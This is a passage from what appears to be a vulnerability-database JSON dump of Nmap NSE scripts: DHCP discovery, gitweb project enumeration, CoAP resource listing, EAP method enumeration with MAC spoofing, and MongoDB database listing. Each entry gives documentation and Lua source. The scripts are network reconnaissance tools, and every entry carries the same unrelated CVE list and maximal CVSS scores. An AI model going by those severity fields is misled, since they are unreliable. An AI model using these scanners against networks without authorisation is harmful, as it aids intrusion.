iface.address) then\n return stdnse.format_output(false, \"Couldn't determine local IP for interface: \" .. host.interface)\n end\n\n local overrides = {}\n\n local macaddr = (stdnse.get_script_args(SCRIPT_NAME .. \".mac\") or \"native\"):lower()\n -- Support for legacy argument \"randomize_mac\"\n local randomize = (stdnse.get_script_args(SCRIPT_NAME .. \".randomize_mac\") or \"false\"):lower()\n if randomize == \"true\" or randomize == \"1\" then\n stdnse.debug1(\"Use %s.mac=random instead of %s.randomize_mac=%s\", SCRIPT_NAME, SCRIPT_NAME, randomize)\n macaddr = \"random\"\n end\n if macaddr ~= \"native\" then\n -- Set the scanner as a relay agent\n overrides.giaddr = string.unpack(\"<I4\", ipOps.ip_to_str(iface.address))\n end\n local macaddr_iter\n if macaddr:find(\"^ra?nd\") then\n macaddr_iter = function () return rand.random_string(6) end\n else\n if macaddr == \"native\" then\n macaddr = host.mac_addr_src\n else\n macaddr = macaddr:gsub(\":\", \"\")\n if not (#macaddr == 12 and macaddr:find(\"^%x+$\")) then\n return stdnse.format_output(false, \"Invalid MAC address\")\n end\n macaddr = stdnse.fromhex(macaddr)\n end\n macaddr_iter = function () return macaddr end\n end\n\n local results = {}\n for i = 1, reqcount do\n local macaddr = macaddr_iter()\n stdnse.debug1(\"Client MAC address: %s\", stdnse.tohex(macaddr, {separator = \":\"}))\n local status, result = dhcp.make_request(host.ip, dhcptypeid, iface.address, macaddr, nil, nil, overrides)\n if not status then\n return stdnse.format_output(false, \"Couldn't send DHCP request: \" .. result)\n end\n table.insert(results, result)\n end\n\n if #results == 0 then\n return nil\n end\n\n nmap.set_port_state(host, port, \"open\")\n\n local response = stdnse.output_table()\n\n -- Display the results\n for i, result in ipairs(results) do\n local result_table = stdnse.output_table()\n\n if dhcptype ~= \"DHCPINFORM\" then\n result_table[\"IP Offered\"] = result.yiaddr_str\n end\n for _, v in ipairs(result.options) do\n if type(v.value) == 'table' then\n outlib.list_sep(v.value)\n end\n result_table[ v.name ] = v.value\n end\n\n if(#results == 1) then\n response = result_table\n else\n response[string.format(\"Response %d of %d\", i, #results)] = result_table\n end\n end\n\n return response\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:43:46", "description": "Retrieves a list of Git projects, owners and descriptions from a gitweb (web interface to the Git revision control system).\n\n## Script Arguments \n\n#### http-gitweb-projects-enum.path \n\nspecifies the location of gitweb (default: /)\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p80 www.example.com --script http-gitweb-projects-enum\n \n\n## Script Output \n \n \n 80/tcp open http\n | http-gitweb-projects-enum:\n | Projects from gitweb.samba.org:\n | PROJECT AUTHOR DESCRIPTION\n | sando.git authornum1 no description\n | camui/san.git devteam no description\n | albert/tdx.git/.git blueteam no description\n |\n | Number of projects: 172\n |_ Number of owners: 42\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-04-20T12:46:49", "type": "nmap", "title": "http-gitweb-projects-enum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-03-24T22:05:51", "id": "NMAP:HTTP-GITWEB-PROJECTS-ENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/http-gitweb-projects-enum.html", "sourceData": "local http = require \"http\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\n\ndescription=[[\nRetrieves a list of Git projects, owners and descriptions from a gitweb (web interface to the Git revision control system).\n]]\n\n---\n-- @usage\n-- nmap -p80 www.example.com --script http-gitweb-projects-enum\n--\n-- @output\n-- 80/tcp open http\n-- | http-gitweb-projects-enum:\n-- | Projects from gitweb.samba.org:\n-- | PROJECT AUTHOR DESCRIPTION\n-- | sando.git authornum1 no description\n-- | camui/san.git devteam no description\n-- | albert/tdx.git/.git blueteam no description\n-- |\n-- | Number of projects: 172\n-- |_ Number of owners: 42\n--\n-- @args http-gitweb-projects-enum.path specifies the location of gitweb\n-- (default: /)\n\nauthor = \"riemann\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.http\n\n---\n-- @param author bloc (if author name are too long we have a span bloc)\n-- @return author name filtred from html entities\n---\nget_owner = function(res)\n local result=res\n local _\n if ( res:match('<span') ) then\n _,_,result=string.find(res,'title=\"(.-)\"')\n end\n return result\nend\n\naction = function(host, port)\n\n local path = stdnse.get_script_args(SCRIPT_NAME .. '.path') or '/'\n local response = http.get(host,port,path)\n local result, result_stats = {}, {}\n\n if not response or not response.status or response.status ~= 200 or\n not response.body then\n stdnse.debug1(\"Failed to retrieve file: %s\", path)\n return\n end\n\n local html = response.body\n local repo=tab.new()\n tab.addrow(repo,'PROJECT','AUTHOR','DESCRIPTION')\n\n -- verif generator\n if (html:match('meta name=\"generator\" content=\"gitweb(.-)\"')) then\n result['name'] = string.format(\"Projects from %s:\", host.targetname or host.ip)\n\n local owners, projects_counter, owners_counter = {}, 0, 0\n\n for tr_code in html:gmatch('(%<tr[^<>]*%>(.-)%</tr%>)') do\n local regx='<a[^<>]*href=\"(.-)\">(.-)</a>(.-)title=\"(.-)\"(.-)<i>(.-)</i>'\n for _, project, _, desc, _, owner in tr_code:gmatch(regx) do\n\n --if desc result return default text of gitweb replace it by no description\n if(string.find(desc,'Unnamed repository')) then\n desc='no description'\n end\n\n tab.addrow(repo, project, get_owner(owner), desc)\n\n -- Protect from parsing errors or long owners\n -- just an arbitrary value\n if owner:len() < 128 and not owners[owner] then\n owners[owner] = true\n owners_counter = owners_counter + 1\n end\n\n projects_counter = projects_counter + 1\n end\n end\n\n table.insert(result,tab.dump(repo))\n table.insert(result, \"\")\n table.insert(result,\n string.format(\"Number of projects: %d\", projects_counter))\n if (owners_counter > 0 ) then\n table.insert(result,\n string.format(\"Number of owners: %d\", owners_counter))\n end\n\n end\n return stdnse.format_output(true,result)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:22", "description": "Dumps list of available resources from CoAP endpoints. \n\nThis script establishes a connection to a CoAP endpoint and performs a GET request on a resource. The default resource for our request is <code>/.well-known/core</core>, which should contain a list of resources provided by the endpoint. \n\nFor additional information: \n\n * <https://en.wikipedia.org/wiki/Constrained_Application_Protocol>\n * <https://tools.ietf.org/html/rfc7252>\n * <https://tools.ietf.org/html/rfc6690>\n\n## Script Arguments \n\n#### coap-resources.uri \n\nURI to request via the GET method, `/.well-known/core` by default.\n\n## Example Usage \n \n \n nmap -p U:5683 -sU --script coap-resources <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 5683/udp open coap udp-response ttl 36\n | coap-resources:\n | /large:\n | rt: block\n | sz: 1280\n | title: Large resource\n | /large-update:\n | ct: 0\n | rt: block\n | sz: 55\n | title: Large resource that can be updated using PUT method\n | /link1:\n | if: If1\n | rt: Type1 Type2\n |_ title: Link test resource\n \n\n## Requires \n\n * [coap](<../lib/coap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [stringaux](<../lib/stringaux.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-09-08T21:19:55", "type": "nmap", "title": "coap-resources NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:COAP-RESOURCES.NSE", "href": "https://nmap.org/nsedoc/scripts/coap-resources.html", "sourceData": "local coap = require \"coap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal stringaux = require \"stringaux\"\nlocal table = require \"table\"\n\ndescription = [[\nDumps list of available resources from CoAP endpoints.\n\nThis script establishes a connection to a CoAP endpoint and performs a\nGET request on a resource. The default resource for our request is\n<code>/.well-known/core</core>, which should contain a list of\nresources provided by the endpoint.\n\nFor additional information:\n* https://en.wikipedia.org/wiki/Constrained_Application_Protocol\n* https://tools.ietf.org/html/rfc7252\n* https://tools.ietf.org/html/rfc6690\n]]\n\n---\n-- @usage nmap -p U:5683 -sU --script coap-resources <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 5683/udp open coap udp-response ttl 36\n-- | coap-resources:\n-- | /large:\n-- | rt: block\n-- | sz: 1280\n-- | title: Large resource\n-- | /large-update:\n-- | ct: 0\n-- | rt: block\n-- | sz: 55\n-- | title: Large resource that can be updated using PUT method\n-- | /link1:\n-- | if: If1\n-- | rt: Type1 Type2\n-- |_ title: Link test resource\n--\n-- @args coap-resources.uri URI to request via the GET method,\n-- <code>/.well-known/core</code> by default.\n--\n-- @xmloutput\n-- <table key=\"/\">\n-- <elem key=\"ct\">0</elem>\n-- <elem key=\"title\">General Info</elem>\n-- </table>\n-- <table key=\"/ft\">\n-- <elem key=\"ct\">0</elem>\n-- <elem key=\"title\">Faults Reporting</elem>\n-- </table>\n-- <table key=\"/mn\">\n-- <elem key=\"ct\">0</elem>\n-- <elem key=\"title\">Monitor Reporting</elem>\n-- </table>\n-- <table key=\"/st\">\n-- <elem key=\"ct\">0</elem>\n-- <elem key=\"title\">Status Reporting</elem>\n-- </table>\n-- <table key=\"/time\">\n-- <elem key=\"ct\">0</elem>\n-- <elem key=\"obs,</devices/block>;title\">Devices Block</elem>\n-- <elem key=\"title\">Internal Clock</elem>\n-- </table>\n-- <table key=\"/wn\">\n-- <elem key=\"ct\">0</elem>\n-- <elem key=\"title\">Warnings Reporting</elem>\n-- </table>\n\nauthor = \"Mak Kolybabi <mak@kolybabi.com>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\", \"discovery\"}\n\n-- TODO: Add 5684 \"coaps\" if DTLS support is added\nportrule = shortport.port_or_service(5683, \"coap\", \"udp\")\n\nformat_payload = function(payload)\n -- Leave strings alone.\n if type(payload) == \"string\" then\n return payload\n end\n\n local tbl = stdnse.output_table()\n\n -- We want to go through all of the links in alphabetical order.\n table.sort(payload, function(a,b) return a.name < b.name end)\n\n for _, link in ipairs(payload) do\n -- We want to go through all of the parameters in alphabetical\n -- order.\n table.sort(link.parameters, function(a,b) return a.name < b.name end)\n\n local row = stdnse.output_table()\n for _, param in ipairs(link.parameters) do\n row[param.name] = param.value\n end\n\n tbl[link.name] = row\n end\n\n return tbl\nend\n\nget_blocks = function(helper, options, b2opt, payload, max_reqs)\n -- Initialize the block table to store all of our received blocks.\n local blocks = {}\n blocks[b2opt.number] = payload\n\n -- If we don't know the number of the last block, we'll need to use\n -- the largest number we've seen as the maxumum.\n local max = b2opt.number\n\n -- If the first block we received happens to be the last one, either\n -- by being a one-block sequence or by the endpoint sending us the\n -- last block in the sequence first, we want to record the final\n -- number in the sequence.\n local last = nil\n if b2opt.more == false then\n last = b2opt.number\n max = b2opt.number\n end\n\n -- We'll continue to request blocks that are the same size as the\n -- original block, since the endpoint likely prefers that.\n local length = b2opt.length\n\n -- We want to track the number of requests we make so that a\n -- malicious endpoint can't keep us on the hook forever.\n for req = 1, max_reqs do\n -- Determine if there are any blocks in the sequence that we have\n -- not yet received.\n local top = max + 1\n if last then\n top = last\n end\n\n local num = top\n for i = 0, top do\n if not blocks[i] then\n num = i\n break\n end\n end\n\n -- If the block we think we're missing is at the end of the\n -- sequence, we've got them all.\n if last and num >= last then\n stdnse.debug3(\"All %d blocks have been retrieved.\", last)\n break\n end\n\n -- Create the request.\n local opts = {\n [\"code\"] = \"get\",\n [\"type\"] = \"confirmable\",\n [\"options\"] = {\n {[\"name\"] = \"block2\", [\"value\"] = {\n [\"number\"] = num,\n [\"more\"] = false,\n [\"length\"] = length\n }}\n }\n }\n\n local components = stringaux.strsplit(\"/\", options.uri)\n for _, component in ipairs(components) do\n if component ~= \"\" then\n table.insert(opts.options, {[\"name\"] = \"uri_path\", [\"value\"] = component})\n end\n end\n\n -- Send the request and receive the response.\n stdnse.debug3(\"Requesting block %d of size %d.\", num, length)\n local status, response = helper:request(opts)\n if not status then\n return false, response\n end\n\n if not response.payload then\n return false, \"Response did not contain a payload.\"\n end\n\n -- Check for the presence of the block2 option, and if it's\n -- missing then we're going to stop.\n b2opt = coap.COAP.header.find_option(response, \"block2\")\n if not b2opt then\n stdnse.debug1(\"Stopped requesting more blocks, response found without block2 option.\")\n break\n end\n\n stdnse.debug3(\"Received block %d of size %d.\", b2opt.number, b2opt.length)\n blocks[b2opt.number] = response.payload\n\n if b2opt.more == false then\n stdnse.debug3(\"Block %d indicates it is the end of the sequence.\", b2opt.number, b2opt.length)\n last = b2opt.number\n max = b2opt.number\n elseif b2opt.number > max then\n max = b2opt.number\n end\n end\n\n -- Reassemble payload, handling potentially missing blocks.\n local result = \"\"\n for i = 1, max do\n if not blocks[i] then\n stdnse.debug3(\"Block %d is missing, replacing with dummy data.\", i)\n result = result .. (\"<! missing block %d!>\"):format(i)\n else\n result = result .. blocks[i]\n end\n end\n\n return true, result\nend\n\nlocal function parse_args ()\n local args = {}\n\n local uri = stdnse.get_script_args(SCRIPT_NAME .. '.uri')\n if not uri then\n uri = \"/.well-known/core\"\n end\n args.uri = uri\n\n return true, args\nend\n\naction = function(host, port)\n local output = stdnse.output_table()\n\n -- Parse and sanity check the command line arguments.\n local status, options = parse_args()\n if not status then\n output.ERROR = options\n return output, output.ERROR\n end\n\n -- Create an instance of the CoAP library's client object.\n local helper = coap.Helper:new(host, port)\n\n -- Connect to the CoAP endpoint.\n local status, response = helper:connect({[\"uri\"] = options.uri})\n if not status then\n -- Erros at this stage indicate we're probably not talking to a CoAP server,\n -- so we exit silently.\n return nil\n end\n\n -- Check that the response is a 2.05, otherwise we don't know how to\n -- continue.\n if response.code ~= \"content\" then\n -- If the port runs an echo service, we'll see an unexpected 'get' code.\n if response.code == \"get\" then\n -- Exit silently, this has all been a mistake.\n return nil\n end\n\n -- If the requested resource wasn't found, that's okay.\n if response.code == \"not_found\" then\n stdnse.debug1(\"The target reports that the resource '%s' was not found.\", options.uri)\n return nil\n end\n\n -- Otherwise, we assume that we're getting a legitimate CoAP response.\n output.ERROR = (\"Server responded with '%s' code where 'content' was expected.\"):format(response.code)\n return output, output.ERROR\n end\n\n local result = response.payload\n if not result then\n output.ERROR = \"Payload for initial response was not part of the packet.\"\n return output, output.ERROR\n end\n\n -- Check for the presence of the block2 option, which indicates that\n -- we'll need to perform more requests.\n local b2opt = coap.COAP.header.find_option(response, \"block2\")\n if b2opt then\n -- Since the block2 option was used, the payload should be an unparsed string.\n assert(type(result) == \"string\")\n\n local status, payload = get_blocks(helper, options, b2opt, result, 64)\n if not status then\n output.ERROR = result\n return output, output.ERROR\n end\n result = result .. payload\n\n -- Parse the payload.\n local status, parsed = coap.COAP.payload.parse(response, result)\n if not status then\n stdnse.debug1(\"Failed to parse payload: %s\", parsed)\n stdnse.debug1(\"Falling back to returning raw payload as last resort.\")\n output[\"Raw CoAP response\"] = result\n return output, stdnse.format_output(true, output)\n end\n\n result = parsed\n end\n\n -- Regardless of whether the block2 option was used, we should now have a\n -- parsed payload in some format or another. For now, they should all be\n -- strings or tables.\n assert(type(result) == \"string\" or type(result) == \"table\")\n\n -- If the payload has been parsed, and we requested the default\n -- resource, then we know how to format it nicely.\n local formatted = result\n if true then\n formatted = format_payload(result)\n end\n\n return formatted\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:32", "description": "Enumerates the authentication methods offered by an EAP (Extensible Authentication Protocol) authenticator for a given identity or for the anonymous identity if no argument is passed.\n\n## Script Arguments \n\n#### eap-info.identity \n\nIdentity to use for the first step of the authentication methods (if omitted \"anonymous\" will be used).\n\n#### eap-info.scan \n\nTable of authentication methods to test, e.g. { 4, 13, 25 } for MD5, TLS and PEAP. Default: TLS, TTLS, PEAP, MSCHAP.\n\n#### eap-info.timeout \n\nMaximum time allowed for the scan (default 10s). Methods not tested because of timeout will be listed as \"unknown\".\n\n#### eap-info.interface \n\nNetwork interface to use for the scan, overrides \"-e\".\n\n## Example Usage \n \n \n nmap -e interface --script eap-info [--script-args=\"eap-info.identity=0-user,eap-info.scan={13,50}\"] <target>\n \n\n## Script Output \n \n \n Pre-scan script results:\n | eap-info:\n | Available authentication methods with identity=\"anonymous\" on interface eth2\n | true PEAP\n | true EAP-TTLS\n | false EAP-TLS\n |_ false EAP-MSCHAP-V2\n \n\n## Requires \n\n * [eap](<../lib/eap.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-03-08T18:00:35", "type": "nmap", "title": "eap-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-03-24T22:05:52", "id": "NMAP:EAP-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/eap-info.html", "sourceData": "local eap = require \"eap\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\ndescription = [[\nEnumerates the authentication methods offered by an EAP (Extensible\nAuthentication Protocol) authenticator for a given identity or for the\nanonymous identity if no argument is passed.\n]]\n\n---\n-- @usage\n-- nmap -e interface --script eap-info [--script-args=\"eap-info.identity=0-user,eap-info.scan={13,50}\"] <target>\n--\n-- @output\n-- Pre-scan script results:\n-- | eap-info:\n-- | Available authentication methods with identity=\"anonymous\" on interface eth2\n-- | true PEAP\n-- | true EAP-TTLS\n-- | false EAP-TLS\n-- |_ false EAP-MSCHAP-V2\n--\n-- @args eap-info.identity Identity to use for the first step of the authentication methods (if omitted \"anonymous\" will be used).\n-- @args eap-info.scan Table of authentication methods to test, e.g. { 4, 13, 25 } for MD5, TLS and PEAP. Default: TLS, TTLS, PEAP, MSCHAP.\n-- @args eap-info.interface Network interface to use for the scan, overrides \"-e\".\n-- @args eap-info.timeout Maximum time allowed for the scan (default 10s). Methods not tested because of timeout will be listed as \"unknown\".\n\nauthor = \"Riccardo Cecolin\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = { \"broadcast\", \"safe\" }\n\n\nprerule = function()\n return nmap.is_privileged()\nend\n\nlocal default_scan = {\n eap.eap_t.TLS,\n eap.eap_t.TTLS,\n eap.eap_t.PEAP,\n eap.eap_t.MSCHAP,\n}\n\nlocal UNKNOWN = \"unknown\"\n\naction = function()\n\n local arg_interface = stdnse.get_script_args(SCRIPT_NAME .. \".interface\")\n local arg_identity = stdnse.get_script_args(SCRIPT_NAME .. \".identity\")\n local arg_scan = stdnse.get_script_args(SCRIPT_NAME .. \".scan\")\n local arg_timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. \".timeout\"))\n local iface\n\n -- trying with provided interface name\n if arg_interface then\n iface = nmap.get_interface_info(arg_interface)\n end\n\n -- trying with default nmap interface\n if not iface then\n local iname = nmap.get_interface()\n if iname then\n iface = nmap.get_interface_info(iname)\n end\n end\n\n -- failed\n if not iface then\n return \"please specify an interface with -e\"\n end\n stdnse.debug1(\"iface: %s\", iface.device)\n\n local timeout = (arg_timeout or 10) * 1000\n\n stdnse.debug2(\"timeout: %s\", timeout)\n\n local pcap = nmap.new_socket()\n pcap:pcap_open(iface.device, 512, true, \"ether proto 0x888e\")\n\n\n local identity = { name=\"anonymous\", auth = {}, probe = -1 }\n\n if arg_identity then\n identity.name = tostring(arg_identity)\n end\n\n local scan\n if arg_scan == nil or type(arg_scan) ~= \"table\" or #arg_scan == 0 then\n scan = default_scan\n else\n scan = arg_scan\n end\n\n local valid = false\n for i,v in ipairs(scan) do\n v = tonumber(v)\n if v ~= nil and v < 256 and v > 3 then\n stdnse.debug1(\"selected: %s\", eap.eap_str[v] or \"unassigned\" )\n identity.auth[v] = UNKNOWN\n valid = true\n end\n end\n\n if not valid then\n return \"no valid scan methods provided\"\n end\n\n local tried_all = false\n\n local start_time = nmap.clock_ms()\n eap.send_start(iface)\n\n while(nmap.clock_ms() - start_time < timeout) and not tried_all do\n local status, plen, l2_data, l3_data, time = pcap:pcap_receive()\n if (status) then\n stdnse.debug2(\"packet size: 0x%x\", plen )\n local packet = eap.parse(l2_data .. l3_data)\n\n if packet then\n stdnse.debug2(\"packet valid\")\n\n -- respond to identity requests, using the same session id\n if packet.eap.type == eap.eap_t.IDENTITY and packet.eap.code == eap.code_t.REQUEST then\n stdnse.debug1(\"server identity: %s\",packet.eap.body.identity)\n eap.send_identity_response(iface, packet.eap.id, identity.name)\n end\n\n -- respond with NAK to every auth request to enumerate them until we get a failure\n if packet.eap.type ~= eap.eap_t.IDENTITY and packet.eap.code == eap.code_t.REQUEST then\n stdnse.debug1(\"auth request: %s\",eap.eap_str[packet.eap.type])\n identity.auth[packet.eap.type] = true\n\n identity.probe = -1\n for i,v in pairs(identity.auth) do\n stdnse.debug1(\"identity.auth: %d %s\",i,tostring(v))\n if v == UNKNOWN then\n identity.probe = i\n eap.send_nak_response(iface, packet.eap.id, i)\n break\n end\n end\n if identity.probe == -1 then tried_all = true end\n end\n\n -- retry on failure\n if packet.eap.code == eap.code_t.FAILURE then\n stdnse.debug1(\"auth failure\")\n identity.auth[identity.probe] = false\n\n -- don't give up at the first failure!\n -- mac spoofing to avoid to wait too much\n local d = string.byte(iface.mac,6)\n d = (d + 1) % 256\n iface.mac = iface.mac:sub(1,5) .. string.pack(\"B\",d)\n\n tried_all = true\n for i,v in pairs(identity.auth) do\n if v == UNKNOWN then\n tried_all = false\n break\n end\n end\n if not tried_all then\n eap.send_start(iface)\n end\n end\n\n else\n stdnse.debug1(\"packet invalid! wrong filter?\")\n end\n end\n end\n\n local results = { [\"name\"] = (\"Available authentication methods with identity=\\\"%s\\\" on interface %s\"):format(identity.name, iface.device) }\n for i,v in pairs(identity.auth) do\n if v== true then\n table.insert(results, 1, (\"%-8s %s\"):format(tostring(v), eap.eap_str[i] or \"unassigned\" ))\n else\n table.insert(results, (\"%-8s %s\"):format(tostring(v), eap.eap_str[i] or \"unassigned\" ))\n end\n end\n\n for i,v in ipairs(results) do\n stdnse.debug1(\"%s\", tostring(v))\n end\n\n return stdnse.format_output(true, results)\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:40:45", "description": "Attempts to get a list of tables from a MongoDB database.\n\n## Script Arguments \n\n#### mongodb.db \n\nSee the documentation for the [mongodb](<../lib/mongodb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 27017 --script mongodb-databases <host>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 27017/tcp open unknown syn-ack\n | mongodb-databases:\n | ok = 1\n | databases\n | 1\n | empty = false\n | sizeOnDisk = 83886080\n | name = test\n | 0\n | empty = false\n | sizeOnDisk = 83886080\n | name = httpstorage\n | 3\n | empty = true\n | sizeOnDisk = 1\n | name = local\n | 2\n | empty = true\n | sizeOnDisk = 1\n | name = admin\n |_ totalSize = 167772160\n\n## Requires \n\n * [creds](<../lib/creds.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [mongodb](<../lib/mongodb.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-01-29T22:23:06", "type": "nmap", "title": "mongodb-databases NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-05-07T20:15:22", "id": "NMAP:MONGODB-DATABASES.NSE", "href": "https://nmap.org/nsedoc/scripts/mongodb-databases.html", "sourceData": "local creds = require \"creds\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\nlocal mongodb = stdnse.silent_require \"mongodb\"\n\ndescription = [[\nAttempts to get a list of tables from a MongoDB database.\n]]\n\n---\n-- @usage\n-- nmap -p 27017 --script mongodb-databases <host>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 27017/tcp open unknown syn-ack\n-- | mongodb-databases:\n-- | ok = 1\n-- | databases\n-- | 1\n-- | empty = false\n-- | sizeOnDisk = 83886080\n-- | name = test\n-- | 0\n-- | empty = false\n-- | sizeOnDisk = 83886080\n-- | name = httpstorage\n-- | 3\n-- | empty = true\n-- | sizeOnDisk = 1\n-- | name = local\n-- | 2\n-- | empty = true\n-- | sizeOnDisk = 1\n-- | name = admin\n-- |_ totalSize = 167772160\n\n-- version 0.2\n-- Created 01/12/2010 - v0.1 - created by Martin Holst Swende <martin@swende.se>\n-- Revised 01/03/2012 - v0.2 - added authentication support <patrik@cqure.net>\n\nauthor = \"Martin Holst Swende\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\n\ndependencies = {\"mongodb-brute\"}\n\n\nportrule = shortport.port_or_service({27017}, {\"mongodb\", \"mongod\"})\n\nfunction action(host,port)\n\n local socket = nmap.new_socket()\n\n -- set a reasonable timeout value\n socket:set_timeout(10000)\n -- do some exception / cleanup\n local catch = function()\n socket:close()\n 